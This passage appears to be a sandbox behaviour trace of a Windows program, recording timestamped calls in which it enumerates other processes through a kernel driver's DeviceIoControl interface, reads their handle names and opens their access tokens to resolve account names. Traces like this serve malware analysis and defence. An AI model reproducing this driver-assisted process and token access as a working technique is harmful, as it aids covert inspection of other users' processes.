0x0 [0245.874] ZwClose (Handle=0xffffffff800007dc) returned 0x0 [0245.874] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.874] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0245.874] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0245.876] CloseHandle (hObject=0xc4) returned 1 [0245.876] CloseHandle (hObject=0xc8) returned 1 [0245.876] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.876] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0245.876] PsLookupProcessByProcessId (in: ProcessId=0x138, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.876] PsAcquireProcessExitSynchronization () returned 0x0 [0245.876] KeStackAttachProcess (in: PROCESS=0xfffffa8001f23b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001f23b30, ApcState=0xfffff880053c85d0) [0245.876] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8001f61650, HandleInformation=0x0) returned 0x0 [0245.877] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.877] PsReleaseProcessExitSynchronization () returned 0x2 [0245.877] ObfDereferenceObject (Object=0xfffffa8001f23b30) returned 0x12 [0245.877] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003122044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003122044, ReturnLength=0xfffff880053c8508) returned 0x0 [0245.877] ObfDereferenceObject (Object=0xfffffa8001f61650) returned 0x1 [0245.877] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.877] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.877] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.877] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x84, lpOverlapped=0x0) returned 1 [0245.877] PsLookupProcessByProcessId (in: ProcessId=0x138, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.877] PsAcquireProcessExitSynchronization () returned 0x0 [0245.877] KeStackAttachProcess (in: PROCESS=0xfffffa8001f23b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001f23b30, ApcState=0xfffff880053c85d0) [0245.877] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8001f61850, HandleInformation=0x0) returned 0x0 [0245.877] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.877] PsReleaseProcessExitSynchronization () returned 0x2 [0245.877] ObfDereferenceObject (Object=0xfffffa8001f23b30) returned 0x12 [0245.877] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800307d044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa800307d044, ReturnLength=0xfffff880053c8508) returned 0x0 [0245.877] ObfDereferenceObject (Object=0xfffffa8001f61850) returned 0x1 [0245.877] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.877] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.877] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.877] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0245.877] PsLookupProcessByProcessId (in: ProcessId=0x138, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.877] PsAcquireProcessExitSynchronization () returned 0x0 [0245.877] KeStackAttachProcess (in: PROCESS=0xfffffa8001f23b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001f23b30, ApcState=0xfffff880053c85d0) [0245.878] ObReferenceObjectByHandle (in: Handle=0x64, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0245.878] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.878] PsReleaseProcessExitSynchronization () returned 0x2 [0245.878] ObfDereferenceObject (Object=0xfffffa8001f23b30) returned 0x12 [0245.878] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa8003084044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003084044, ReturnLength=0xfffff880053c8550) returned 0x0 [0245.878] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x50 [0245.878] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.878] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.878] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x79c) returned 0xc8 [0245.878] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0245.878] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880053c8668, HandleInformation=0x0 | out: Object=0xfffff880053c8668*=0xfffffa8001f73350, HandleInformation=0x0) returned 0x0 [0245.878] ObOpenObjectByPointer (in: Object=0xfffffa8001f73350, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880053c8670 | out: Handle=0xfffff880053c8670*=0xffffffff800007dc) returned 0x0 [0245.878] ObfDereferenceObject (Object=0xfffffa8001f73350) returned 0x14 [0245.878] ZwOpenProcessToken (in: ProcessHandle=0xffffffff800007dc, DesiredAccess=0x8, TokenHandle=0xfffffa80030a6d00 | out: TokenHandle=0xfffffa80030a6d00*=0xc4) returned 0x0 [0245.878] ZwClose (Handle=0xffffffff800007dc) returned 0x0 [0245.878] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.878] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0245.878] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0245.880] CloseHandle (hObject=0xc4) returned 1 [0245.880] CloseHandle (hObject=0xc8) returned 1 [0245.880] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.880] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0245.880] PsLookupProcessByProcessId (in: ProcessId=0x79c, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.880] PsAcquireProcessExitSynchronization () returned 0x0 [0245.880] KeStackAttachProcess (in: PROCESS=0xfffffa8001f73350, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001f73350, ApcState=0xfffff880053c85d0) [0245.881] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8001f9af20, HandleInformation=0x0) returned 0x0 [0245.881] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.881] PsReleaseProcessExitSynchronization () returned 0x2 [0245.881] ObfDereferenceObject (Object=0xfffffa8001f73350) returned 0x12 [0245.881] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80019dd044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa80019dd044, ReturnLength=0xfffff880053c8508) returned 0x0 [0245.881] ObfDereferenceObject (Object=0xfffffa8001f9af20) returned 0x1 [0245.881] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.881] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.881] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.881] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x8a, lpOverlapped=0x0) returned 1 [0245.881] PsLookupProcessByProcessId (in: ProcessId=0x79c, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.881] PsAcquireProcessExitSynchronization () returned 0x0 [0245.881] KeStackAttachProcess (in: PROCESS=0xfffffa8001f73350, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001f73350, ApcState=0xfffff880053c85d0) [0245.881] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8001f73b50, HandleInformation=0x0) returned 0x0 [0245.881] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.881] PsReleaseProcessExitSynchronization () returned 0x2 [0245.881] ObfDereferenceObject (Object=0xfffffa8001f73350) returned 0x12 [0245.881] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003065044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003065044, ReturnLength=0xfffff880053c8508) returned 0x0 [0245.881] ObfDereferenceObject (Object=0xfffffa8001f73b50) returned 0x1 [0245.881] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.882] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.882] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.882] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0245.882] PsLookupProcessByProcessId (in: ProcessId=0x79c, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.882] PsAcquireProcessExitSynchronization () returned 0x0 [0245.882] KeStackAttachProcess (in: PROCESS=0xfffffa8001f73350, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001f73350, ApcState=0xfffff880053c85d0) [0245.882] ObReferenceObjectByHandle (in: Handle=0x64, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0245.882] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.882] PsReleaseProcessExitSynchronization () returned 0x2 [0245.882] ObfDereferenceObject (Object=0xfffffa8001f73350) returned 0x12 [0245.882] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa8003066044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003066044, ReturnLength=0xfffff880053c8550) returned 0x0 [0245.882] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x50 [0245.882] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.882] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.882] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7f4) returned 0xc8 [0245.882] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0245.882] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880053c8668, HandleInformation=0x0 | out: Object=0xfffff880053c8668*=0xfffffa8001fcdb30, HandleInformation=0x0) returned 0x0 [0245.882] ObOpenObjectByPointer (in: Object=0xfffffa8001fcdb30, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880053c8670 | out: Handle=0xfffff880053c8670*=0xffffffff800007dc) returned 0x0 [0245.882] ObfDereferenceObject (Object=0xfffffa8001fcdb30) returned 0x14 [0245.882] ZwOpenProcessToken (in: ProcessHandle=0xffffffff800007dc, DesiredAccess=0x8, TokenHandle=0xfffffa80030a6d00 | out: TokenHandle=0xfffffa80030a6d00*=0xc4) returned 0x0 [0245.882] ZwClose (Handle=0xffffffff800007dc) returned 0x0 [0245.882] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.883] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0245.883] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0245.884] CloseHandle (hObject=0xc4) returned 1 [0245.885] CloseHandle (hObject=0xc8) returned 1 [0245.885] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.885] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0245.885] PsLookupProcessByProcessId (in: ProcessId=0x7f4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.885] PsAcquireProcessExitSynchronization () returned 0x0 [0245.885] KeStackAttachProcess (in: PROCESS=0xfffffa8001fcdb30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001fcdb30, ApcState=0xfffff880053c85d0) [0245.885] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8001fa4d10, HandleInformation=0x0) returned 0x0 [0245.885] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.885] PsReleaseProcessExitSynchronization () returned 0x2 [0245.885] ObfDereferenceObject (Object=0xfffffa8001fcdb30) returned 0x12 [0245.885] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003068044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003068044, ReturnLength=0xfffff880053c8508) returned 0x0 [0245.885] ObfDereferenceObject (Object=0xfffffa8001fa4d10) returned 0x1 [0245.885] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.885] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.885] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.885] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x6a, lpOverlapped=0x0) returned 1 [0245.885] PsLookupProcessByProcessId (in: ProcessId=0x7f4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.885] PsAcquireProcessExitSynchronization () returned 0x0 [0245.886] KeStackAttachProcess (in: PROCESS=0xfffffa8001fcdb30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001fcdb30, ApcState=0xfffff880053c85d0) [0245.886] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8003a3e260, HandleInformation=0x0) returned 0x0 [0245.886] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.886] PsReleaseProcessExitSynchronization () returned 0x2 [0245.886] ObfDereferenceObject (Object=0xfffffa8001fcdb30) returned 0x12 [0245.886] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003069044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003069044, ReturnLength=0xfffff880053c8508) returned 0x0 [0245.886] ObfDereferenceObject (Object=0xfffffa8003a3e260) returned 0x1 [0245.886] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.886] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.886] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.886] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0245.886] PsLookupProcessByProcessId (in: ProcessId=0x7f4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.886] PsAcquireProcessExitSynchronization () returned 0x0 [0245.886] KeStackAttachProcess (in: PROCESS=0xfffffa8001fcdb30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001fcdb30, ApcState=0xfffff880053c85d0) [0245.886] ObReferenceObjectByHandle (in: Handle=0x64, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0245.886] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.886] PsReleaseProcessExitSynchronization () returned 0x2 [0245.886] ObfDereferenceObject (Object=0xfffffa8001fcdb30) returned 0x12 [0245.886] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa800306a044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800306a044, ReturnLength=0xfffff880053c8550) returned 0x0 [0245.886] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x50 [0245.886] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.886] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.887] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0xc8 [0245.887] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0245.887] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880053c8668, HandleInformation=0x0 | out: Object=0xfffff880053c8668*=0xfffffa8001f5bb30, HandleInformation=0x0) returned 0x0 [0245.887] ObOpenObjectByPointer (in: Object=0xfffffa8001f5bb30, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880053c8670 | out: Handle=0xfffff880053c8670*=0xffffffff800007dc) returned 0x0 [0245.887] ObfDereferenceObject (Object=0xfffffa8001f5bb30) returned 0x14 [0245.887] ZwOpenProcessToken (in: ProcessHandle=0xffffffff800007dc, DesiredAccess=0x8, TokenHandle=0xfffffa80030a6d00 | out: TokenHandle=0xfffffa80030a6d00*=0xc4) returned 0x0 [0245.887] ZwClose (Handle=0xffffffff800007dc) returned 0x0 [0245.887] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.887] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0245.887] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0245.889] CloseHandle (hObject=0xc4) returned 1 [0245.889] CloseHandle (hObject=0xc8) returned 1 [0245.889] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.889] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0245.889] PsLookupProcessByProcessId (in: ProcessId=0x7e0, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.889] PsAcquireProcessExitSynchronization () returned 0x0 [0245.889] KeStackAttachProcess (in: PROCESS=0xfffffa8001f5bb30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001f5bb30, ApcState=0xfffff880053c85d0) [0245.889] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8001f74ae0, HandleInformation=0x0) returned 0x0 [0245.890] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.890] PsReleaseProcessExitSynchronization () returned 0x2 [0245.890] ObfDereferenceObject (Object=0xfffffa8001f5bb30) returned 0x12 [0245.890] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800306f044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa800306f044, ReturnLength=0xfffff880053c8508) returned 0x0 [0245.890] ObfDereferenceObject (Object=0xfffffa8001f74ae0) returned 0x1 [0245.890] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.890] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.890] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.890] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x74, lpOverlapped=0x0) returned 1 [0245.890] PsLookupProcessByProcessId (in: ProcessId=0x7e0, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.890] PsAcquireProcessExitSynchronization () returned 0x0 [0245.890] KeStackAttachProcess (in: PROCESS=0xfffffa8001f5bb30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001f5bb30, ApcState=0xfffff880053c85d0) [0245.890] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8001f5b070, HandleInformation=0x0) returned 0x0 [0245.890] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.890] PsReleaseProcessExitSynchronization () returned 0x2 [0245.890] ObfDereferenceObject (Object=0xfffffa8001f5bb30) returned 0x12 [0245.890] ObQueryNameString (in: 